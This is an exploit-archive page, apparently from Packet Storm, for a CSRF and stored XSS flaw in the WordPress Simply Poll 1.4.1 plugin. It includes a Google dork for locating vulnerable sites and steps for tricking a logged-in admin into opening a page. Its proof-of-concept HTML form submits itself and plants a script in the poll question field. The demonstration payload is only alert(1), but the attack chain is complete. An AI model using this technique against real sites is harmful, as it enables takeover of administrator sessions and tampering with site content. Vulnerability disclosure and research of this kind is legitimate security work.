WordPress Simply Poll 1.4.1 CSRF / XSS

WordPress Simply Poll 1.4.1 CSRF / XSS: Posted Mar 18, 2013; Authored by m3tamantra; WordPress Simply Poll third party plugin version 1.4.1 suffers from cross site request forgery and cross site scripting vulnerabilities.; tags | exploit, vulnerability, xss, csrf; SHA-256 | ddddad68953e748aca3717d171b456e43176604fc0cffd022c7d37a8ba52922e; Download | Favorite | View

WordPress Simply Poll 1.4.1 CSRF / XSS

# Exploit Title: WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS
# Google Dork: inurl:"/wp-content/plugins/simply-poll
# Date: 16.03.2013
# Exploit Author: m3tamantra
# Vendor Homepage: http://wordpress.org/extend/plugins/simply-poll/
# Software Link: http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip
# Version: 1.4.1
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
 
Note: After a email to plugins@wordpress.org, "Simply Poll Plugin" was deleted.
 
Description:
- The question parameter is vulnerable to XSS
- Simply Poll has an CSRF vulnerability (Polls=>Add New)
 
The PoC leads to arbitrary javascript execution in back-end area.
 
Steps to exploit the Flaw:
- Save PoC code in html file
- Send a link (pointing to the PoC html file) to a logged in admin
- When Admin view the Page he will automatically add a new Poll which exploits an XSS vulnerability in the question parameter
- When the admin views the Polls the javascript Code will execute
 
Note: this was just an example, it is also possible to remove, reset and edit all Polls.
 
[code]
<html>
<head>
<title>Simply Poll CSRF and XSS</title>
</head>
<body>
<!-- replace "127.0.0.1:9001/wordpress" -->
<form action="http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=sp-add" method="post">
<input type="hidden" name="question" value='Is CSRF+XSS possible?<script>alert(1)</script>' />
<input type="hidden" name="answers[1][answer]" value="yes" />
<input type="hidden" name="answers[2][answer]" value="no" />
<input type="hidden" name="answers[3][answer]" value="maybe" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[5][answer]" value="" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[6][answer]" value="" />
<input type="hidden" name="answers[7][answer]" value="" />
<input type="hidden" name="answers[8][answer]" value="" />
<input type="hidden" name="answers[9][answer]" value="" />
<input type="hidden" name="answers[10][answer]" value="" />
<input type="hidden" name="polledit" value="new" />
</form>
<script>document.forms[0].submit();</script>
 
</body>
</html>
[/code]

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

WordPress Simply Poll 1.4.1 CSRF / XSS

WordPress Simply Poll 1.4.1 CSRF / XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Simply Poll 1.4.1 CSRF / XSS

Share This

WordPress Simply Poll 1.4.1 CSRF / XSS

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems